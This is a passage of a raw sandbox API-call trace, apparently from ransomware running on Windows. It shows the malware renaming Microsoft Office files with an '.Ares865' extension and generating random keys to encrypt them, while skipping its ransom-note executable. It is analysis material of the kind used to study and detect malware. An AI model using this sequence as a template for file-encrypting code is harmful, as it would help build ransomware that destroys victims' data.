dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.209] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.210] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.210] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2c90, lpName=0x0) returned 0x170 [0130.211] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2c90) returned 0x190000 [0130.212] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.213] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.213] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.214] lstrcpyW (in: lpString1=0x2cce46c, lpString2="GrooveIntlResource.dll" | out: lpString1="GrooveIntlResource.dll") returned="GrooveIntlResource.dll" [0130.214] lstrlenW (lpString="GrooveIntlResource.dll") returned 22 [0130.214] lstrlenW (lpString="Ares865") returned 7 [0130.214] lstrcmpiW (lpString1="rce.dll", lpString2="Ares865") returned 1 [0130.214] lstrlenW (lpString=".dll") returned 4 [0130.214] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2=".dll") returned 1 [0130.214] lstrlenW (lpString=".lnk") returned 4 [0130.214] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2=".lnk") returned 1 [0130.214] lstrlenW (lpString=".ini") returned 4 [0130.214] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2=".ini") returned 1 [0130.214] lstrlenW (lpString=".sys") returned 4 [0130.214] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2=".sys") returned 1 [0130.214] lstrlenW (lpString="GrooveIntlResource.dll") returned 22 [0130.214] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.Ares865") returned 84 [0130.214] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\grooveintlresource.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\grooveintlresource.dll.ares865"), dwFlags=0x1) returned 1 [0130.216] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\grooveintlresource.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.216] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8801120) returned 1 [0130.216] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.217] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.217] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.217] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x864e60, lpName=0x0) returned 0x170 [0130.219] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x800000, dwNumberOfBytesToMap=0x64e60) returned 0x420000 [0130.344] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.344] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.344] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.358] lstrcpyW (in: lpString1=0x2cce46c, lpString2="MAPISHELLR.DLL" | out: lpString1="MAPISHELLR.DLL") returned="MAPISHELLR.DLL" [0130.358] lstrlenW (lpString="MAPISHELLR.DLL") returned 14 [0130.358] lstrlenW (lpString="Ares865") returned 7 [0130.358] lstrcmpiW (lpString1="LLR.DLL", lpString2="Ares865") returned 1 [0130.358] lstrlenW (lpString=".dll") returned 4 [0130.358] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2=".dll") returned 1 [0130.358] lstrlenW (lpString=".lnk") returned 4 [0130.358] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2=".lnk") returned 1 [0130.358] lstrlenW (lpString=".ini") returned 4 [0130.358] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2=".ini") returned 1 [0130.358] lstrlenW (lpString=".sys") returned 4 [0130.358] lstrcmpiW (lpString1="MAPISHELLR.DLL", lpString2=".sys") returned 1 [0130.358] lstrlenW (lpString="MAPISHELLR.DLL") returned 14 [0130.359] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL.Ares865") returned 76 [0130.359] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\mapishellr.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\mapishellr.dll.ares865"), dwFlags=0x1) returned 1 [0130.361] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\mapishellr.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.361] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=591832) returned 1 [0130.362] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.362] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.362] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.363] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x90ae0, lpName=0x0) returned 0x170 [0130.365] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x90ae0) returned 0xdd0000 [0130.389] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.390] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.390] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.398] lstrcpyW (in: lpString1=0x2cce46c, lpString2="OCLTINT.DLL" | out: lpString1="OCLTINT.DLL") returned="OCLTINT.DLL" [0130.398] lstrlenW (lpString="OCLTINT.DLL") returned 11 [0130.398] lstrlenW (lpString="Ares865") returned 7 [0130.398] lstrcmpiW (lpString1="INT.DLL", lpString2="Ares865") returned 1 [0130.398] lstrlenW (lpString=".dll") returned 4 [0130.398] lstrcmpiW (lpString1="OCLTINT.DLL", lpString2=".dll") returned 1 [0130.398] lstrlenW (lpString=".lnk") returned 4 [0130.398] lstrcmpiW (lpString1="OCLTINT.DLL", lpString2=".lnk") returned 1 [0130.398] lstrlenW (lpString=".ini") returned 4 [0130.398] lstrcmpiW (lpString1="OCLTINT.DLL", lpString2=".ini") returned 1 [0130.399] lstrlenW (lpString=".sys") returned 4 [0130.399] lstrcmpiW (lpString1="OCLTINT.DLL", lpString2=".sys") returned 1 [0130.399] lstrlenW (lpString="OCLTINT.DLL") returned 11 [0130.399] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OCLTINT.DLL.Ares865") returned 73 [0130.399] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OCLTINT.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\ocltint.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OCLTINT.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\ocltint.dll.ares865"), dwFlags=0x1) returned 1 [0130.402] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OCLTINT.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\ocltint.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.402] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=106384) returned 1 [0130.402] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.403] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.403] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.403] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a290, lpName=0x0) returned 0x170 [0130.404] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a290) returned 0x190000 [0130.410] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.410] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.410] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.412] lstrcpyW (in: lpString1=0x2cce46c, lpString2="OWSHLP10.CHM" | out: lpString1="OWSHLP10.CHM") returned="OWSHLP10.CHM" [0130.412] lstrlenW (lpString="OWSHLP10.CHM") returned 12 [0130.412] lstrlenW (lpString="Ares865") returned 7 [0130.412] lstrcmpiW (lpString1="P10.CHM", lpString2="Ares865") returned 1 [0130.412] lstrlenW (lpString=".dll") returned 4 [0130.412] lstrcmpiW (lpString1="OWSHLP10.CHM", lpString2=".dll") returned 1 [0130.412] lstrlenW (lpString=".lnk") returned 4 [0130.412] lstrcmpiW (lpString1="OWSHLP10.CHM", lpString2=".lnk") returned 1 [0130.412] lstrlenW (lpString=".ini") returned 4 [0130.413] lstrcmpiW (lpString1="OWSHLP10.CHM", lpString2=".ini") returned 1 [0130.413] lstrlenW (lpString=".sys") returned 4 [0130.413] lstrcmpiW (lpString1="OWSHLP10.CHM", lpString2=".sys") returned 1 [0130.413] lstrlenW (lpString="OWSHLP10.CHM") returned 12 [0130.413] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OWSHLP10.CHM.Ares865") returned 74 [0130.413] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OWSHLP10.CHM" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\owshlp10.chm"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OWSHLP10.CHM.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\owshlp10.chm.ares865"), dwFlags=0x1) returned 1 [0130.415] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\OWSHLP10.CHM.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\owshlp10.chm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.415] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0130.415] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0130.415] CloseHandle (hObject=0x0) returned 0 [0130.415] CloseHandle (hObject=0x118) returned 1 [0130.415] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed67eb00, ftCreationTime.dwHighDateTime=0x1cacb3b, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xed67eb00, ftLastWriteTime.dwHighDateTime=0x1cacb3b, nFileSizeHigh=0x0, nFileSizeLow=0x37b90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="STSUCRES.DLL", cAlternateFileName="")) returned 1 [0130.415] lstrcmpiW (lpString1="STSUCRES.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0130.415] lstrcmpiW (lpString1="STSUCRES.DLL", lpString2="aoldtz.exe") returned 1 [0130.415] lstrcpyW (in: lpString1=0x2cce46c, lpString2="STSUCRES.DLL" | out: lpString1="STSUCRES.DLL") returned="STSUCRES.DLL" [0130.415] lstrlenW (lpString="STSUCRES.DLL") returned 12 [0130.415] lstrlenW (lpString="Ares865") returned 7 [0130.415] lstrcmpiW (lpString1="RES.DLL", lpString2="Ares865") returned 1 [0130.415] lstrlenW (lpString=".dll") returned 4 [0130.415] lstrcmpiW (lpString1="STSUCRES.DLL", lpString2=".dll") returned 1 [0130.416] lstrlenW (lpString=".lnk") returned 4 [0130.416] lstrcmpiW (lpString1="STSUCRES.DLL", lpString2=".lnk") returned 1 [0130.416] lstrlenW (lpString=".ini") returned 4 [0130.416] lstrcmpiW (lpString1="STSUCRES.DLL", lpString2=".ini") returned 1 [0130.416] lstrlenW (lpString=".sys") returned 4 [0130.416] lstrcmpiW (lpString1="STSUCRES.DLL", lpString2=".sys") returned 1 [0130.416] lstrlenW (lpString="STSUCRES.DLL") returned 12 [0130.416] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUCRES.DLL.Ares865") returned 74 [0130.416] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUCRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsucres.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUCRES.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsucres.dll.ares865"), dwFlags=0x1) returned 1 [0130.417] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUCRES.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsucres.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.417] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=228240) returned 1 [0130.418] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.418] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.418] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.419] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x37e90, lpName=0x0) returned 0x170 [0130.420] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37e90) returned 0x420000 [0130.429] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.430] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.430] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.434] lstrcpyW (in: lpString1=0x2cce46c, lpString2="STSUPLD.INTL.DLL" | out: lpString1="STSUPLD.INTL.DLL") returned="STSUPLD.INTL.DLL" [0130.434] lstrlenW (lpString="STSUPLD.INTL.DLL") returned 16 [0130.434] lstrlenW (lpString="Ares865") returned 7 [0130.434] lstrcmpiW (lpString1="NTL.DLL", lpString2="Ares865") returned 1 [0130.434] lstrlenW (lpString=".dll") returned 4 [0130.434] lstrcmpiW (lpString1="STSUPLD.INTL.DLL", lpString2=".dll") returned 1 [0130.434] lstrlenW (lpString=".lnk") returned 4 [0130.434] lstrcmpiW (lpString1="STSUPLD.INTL.DLL", lpString2=".lnk") returned 1 [0130.434] lstrlenW (lpString=".ini") returned 4 [0130.434] lstrcmpiW (lpString1="STSUPLD.INTL.DLL", lpString2=".ini") returned 1 [0130.434] lstrlenW (lpString=".sys") returned 4 [0130.434] lstrcmpiW (lpString1="STSUPLD.INTL.DLL", lpString2=".sys") returned 1 [0130.434] lstrlenW (lpString="STSUPLD.INTL.DLL") returned 16 [0130.434] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUPLD.INTL.DLL.Ares865") returned 78 [0130.435] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUPLD.INTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsupld.intl.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUPLD.INTL.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsupld.intl.dll.ares865"), dwFlags=0x1) returned 1 [0130.436] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\STSUPLD.INTL.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\stsupld.intl.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.436] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12672) returned 1 [0130.437] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.437] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.437] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.438] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3480, lpName=0x0) returned 0x170 [0130.439] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3480) returned 0x190000 [0130.440] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.441] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.441] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.441] lstrcpyW (in: lpString1=0x2cce46c, lpString2="UMLVBRES.DLL" | out: lpString1="UMLVBRES.DLL") returned="UMLVBRES.DLL" [0130.442] lstrlenW (lpString="UMLVBRES.DLL") returned 12 [0130.442] lstrlenW (lpString="Ares865") returned 7 [0130.442] lstrcmpiW (lpString1="RES.DLL", lpString2="Ares865") returned 1 [0130.442] lstrlenW (lpString=".dll") returned 4 [0130.442] lstrcmpiW (lpString1="UMLVBRES.DLL", lpString2=".dll") returned 1 [0130.442] lstrlenW (lpString=".lnk") returned 4 [0130.442] lstrcmpiW (lpString1="UMLVBRES.DLL", lpString2=".lnk") returned 1 [0130.442] lstrlenW (lpString=".ini") returned 4 [0130.442] lstrcmpiW (lpString1="UMLVBRES.DLL", lpString2=".ini") returned 1 [0130.442] lstrlenW (lpString=".sys") returned 4 [0130.442] lstrcmpiW (lpString1="UMLVBRES.DLL", lpString2=".sys") returned 1 [0130.442] lstrlenW (lpString="UMLVBRES.DLL") returned 12 [0130.442] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVBRES.DLL.Ares865") returned 74 [0130.442] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVBRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvbres.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVBRES.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvbres.dll.ares865"), dwFlags=0x1) returned 1 [0130.445] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVBRES.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvbres.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.445] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24440) returned 1 [0130.445] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.446] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.446] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.446] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6280, lpName=0x0) returned 0x170 [0130.447] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6280) returned 0x190000 [0130.449] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.450] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.450] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.451] lstrcpyW (in: lpString1=0x2cce46c, lpString2="UMLVC60R.DLL" | out: lpString1="UMLVC60R.DLL") returned="UMLVC60R.DLL" [0130.451] lstrlenW (lpString="UMLVC60R.DLL") returned 12 [0130.451] lstrlenW (lpString="Ares865") returned 7 [0130.451] lstrcmpiW (lpString1="60R.DLL", lpString2="Ares865") returned -1 [0130.451] lstrlenW (lpString=".dll") returned 4 [0130.451] lstrcmpiW (lpString1="UMLVC60R.DLL", lpString2=".dll") returned 1 [0130.451] lstrlenW (lpString=".lnk") returned 4 [0130.451] lstrcmpiW (lpString1="UMLVC60R.DLL", lpString2=".lnk") returned 1 [0130.451] lstrlenW (lpString=".ini") returned 4 [0130.451] lstrcmpiW (lpString1="UMLVC60R.DLL", lpString2=".ini") returned 1 [0130.451] lstrlenW (lpString=".sys") returned 4 [0130.451] lstrcmpiW (lpString1="UMLVC60R.DLL", lpString2=".sys") returned 1 [0130.451] lstrlenW (lpString="UMLVC60R.DLL") returned 12 [0130.451] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVC60R.DLL.Ares865") returned 74 [0130.451] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVC60R.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvc60r.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVC60R.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvc60r.dll.ares865"), dwFlags=0x1) returned 1 [0130.453] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\UMLVC60R.DLL.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\umlvc60r.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0130.453] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27008) returned 1 [0130.453] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0130.454] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0130.454] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.454] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c80, lpName=0x0) returned 0x170 [0130.456] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c80) returned 0x190000 [0130.458] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0130.459] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0130.459] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0130.460] lstrcpyW (in: lpString1=0x2cce46c, lpString2="UMLVSUI.DLL" | out: lpString1="UMLVSUI.DLL") returned="UMLVSUI.DLL" [0130.460] lstrlenW (lpString="UMLVSUI.DLL") returned 11 [0130.460] lstrlenW (lpString="Ares865") returned 7 [0130.460] lstrcmpiW (lpString1="SUI.DLL", lpString2="Ares865") returned 1 [0130.460] lstrlenW (lpString=".dll") returned 4 [0130.460] lstrcmpiW (lpString1="UMLVSUI.DLL", lpString2=".dll") returned 1 [0130.460] lstrlenW (lpString=".lnk") returned 4 [0130.460] lstrcmpiW (lpString1="UMLVSUI.DLL", lpString2=".lnk") returned 1 [0130.460] lstrlenW (lpString=".ini") returned 4 [0130.460] lstrcmpiW (lpString1="UMLVSUI.DLL", lpString2=".ini") returned 1 [0130.460] lstrlenW (lpString=".sys") returned 4 [0130.460] lstrcmpiW (lpString1="UMLVSUI.DLL", lpString2=".sys") returned 1 [0130.460] lstrlenW (lpString="UMLVSUI.DLL") returned 11 